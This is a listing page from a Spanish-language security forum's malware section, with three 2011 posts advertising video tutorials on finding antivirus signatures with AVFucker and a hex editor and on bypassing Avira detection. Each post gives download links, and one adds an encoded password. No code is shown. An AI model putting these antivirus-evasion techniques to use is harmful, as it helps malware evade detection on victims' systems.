28  Seguridad Informática / Análisis y Diseño de Malware / Mostrando AVFucker y Hex (By 2Fac3R) en: 16 Septiembre 2011, 20:36 pm
Bueno amigos, les dejo este Video-Tutorial donde explico el metodo Hex y como sacar firmas con AVFucker, si tienen dudas las pueden hacer por aca o abrir un tema respectivamente.

Les dejo el video (mala calidad ya que lo converti para disminuir peso)



Les dejo el video en Multiupload

http://www.multiupload.com/191PXIKWAC
por si alguien lo quiere descargar.

Comentar es agradecer.
Zalu2
29  Seguridad Informática / Análisis y Diseño de Malware / Metodo Bypass Avira [By 2Fac3R] en: 16 Septiembre 2011, 20:34 pm
Hola amigos, les traigo este metodo que era privado para sacar el Avira.
Espero les guste y con esto se olviden de tener a ese Avira manchando el scann, este metodo es estilo "Variacion" del metodo DAF y el de Need solo que con otra herramienta, ustedes pueden hacerlo a su modo y descubriran cosas nuevas.

Detalles del Video:
Duracion del video: 11:02 Min
Formato .Exe
Hecho con Screen2Exe



"La informacion es libre para todos, pero no siempre es lo mejor"

Descargar --> http://www.multiupload.com/Q156PJSAEL
Pass:


Citar
TWYIM=sn2AYmzojnO=Knygjn2v2mMGYI2QYnwoYIOAKmM4Km2v 2mxQjn0WYnKgYnw12n0SYmzoK82=Km1SYmwgYm0GslL=KnKWYm

(Modo de cifrado)
Armon-64 (keypress M0dFuck) -> Tripo-5 -> Reverser
30  Seguridad Informática / Análisis y Diseño de Malware / Entendiendo AVFucker [By 2Fac!] en: 16 Septiembre 2011, 20:22 pm
Hola hermanos , les traigo este pequeño Video-Tutorial sobre como buscar las firmas con AVFucker, mas explico el funcionamiento especifico de el y como hacer para encontrar la firma, lo que necesitamos para la practica son:

-Un editor Hexadecimal (Hex WorkShop)
-Un locator con AVFucker (como el indetectables offset locator 2.5)

Los programas los pueden encontrar aca

Les dejo el Video... (http://youtu.be/fXA6RhWnRNE)



Recuerden que es modding simple...
Espero les guste, comentar es agradecer.
Zalu2
Páginas: 1 2 [3] 4
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines